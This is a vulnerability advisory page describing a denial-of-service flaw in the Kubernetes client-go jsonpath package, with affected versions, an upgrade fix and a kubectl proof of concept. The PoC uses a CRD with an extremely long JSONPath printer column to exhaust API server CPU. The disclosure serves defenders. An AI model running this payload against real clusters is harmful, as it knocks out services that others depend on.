Denial of Service (DoS) Affecting k8s.io/client-go/util/jsonpath package, versions <0.16.4 >=1.7.6 <1.16.0-beta.1 >=1.17.0-alpha.0 <1.17.0-alpha.1
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-K8SIOCLIENTGOUTILJSONPATH-7540854
- published 18 Jul 2024
- disclosed 24 Jul 2020
- credit lazydog
How to fix?
Upgrade k8s.io/client-go/util/jsonpath to version 0.16.4, 1.16.0-beta.1, 1.17.0-alpha.1 or higher.
Overview
k8s.io/client-go/util/jsonpath is a Go client for Kubernetes.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: foos.example.com
spec:
group: example.com
scope: Namespaced
names:
plural: foos
singular: foo
kind: Foo
version: v1
additionalPrinterColumns:
- name: FOO
type: string
JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
name: foo-cr
spec:
foo:
bar:
baz:
qux: data
EOF
kubectl get foo
The API server CPU usage significantly increases
CVSS Scores
version 3.1